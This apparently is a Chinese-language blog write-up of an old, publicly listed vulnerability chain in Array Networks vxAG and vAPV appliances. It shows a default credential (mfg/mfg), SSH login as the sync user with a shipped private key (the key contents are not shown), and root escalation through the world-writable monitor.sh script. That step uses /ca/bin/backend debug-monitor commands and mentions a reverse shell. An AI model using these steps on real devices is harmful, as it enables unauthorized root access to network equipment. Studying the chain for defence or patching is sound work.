这是一个比较老的漏洞了,但是到目前为止仍然有不少厂商在使用这个版本的设备。在渗透中也曾经遇到过。
参考自:https://www.exploit-db.com/exploits/32369/
受影响的产品有: Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 appliances
默认用户和密码
vxAG 9.2.0.34 和 vAPV 8.3.2.17 的/etc/master.passwd 文件中包含了默认用户和密码
1 | $ cat /etc/master.passwd |
破解之后可以得到下列用户和密码:
1 | 用户: mfg 密码: mfg |
test和root用户没破解出来。
其中sync用户默认可以远程登录:
1 | $ssh sync@192.168.2.55 /bin/sh |
SSH 私钥
sync 用户使用了位于 “~/.ssh/id_dsa” 的登录私钥:
1 | $ cat id_dsa |
下列文件位于 ~/.ssh 目录:
1 | $ cat authorized_keys |
如此一来就可以使用这个私钥进入系统:
将下面的id_dsa私钥保存在”synckey”文件中:
1 | cat > ~/synckey << EOF |
修改synckey文件的权限:
1 | chmod 600 ~/synckey |
使用该私钥登录系统:
1 | ssh -i ~/synckey sync@x.x.x.x /bin/sh |
提权
/ca/bin/monitor.sh和 /ca/bin/debug_syn_stat默认是全局可写的 (权限为777).
在monitor.sh文件中写入脚本,通过debug monitor选项重新启动该脚本会以root权限运行。
使用sync用户运行/ca/bin/backend工具,使用如下方式重启debug monitor:
关闭debug monitor:
1 | /ca/bin/backend -c "debug monitor off"`echo -e "\0374"` |
开启debug monitor:
1 | /ca/bin/backend -c "debug monitor on"`echo -e "\0374"` |
在/ca/bin/monitor.sh中写入反弹shell的指令,通过上述操作,即可反弹回一个root shell.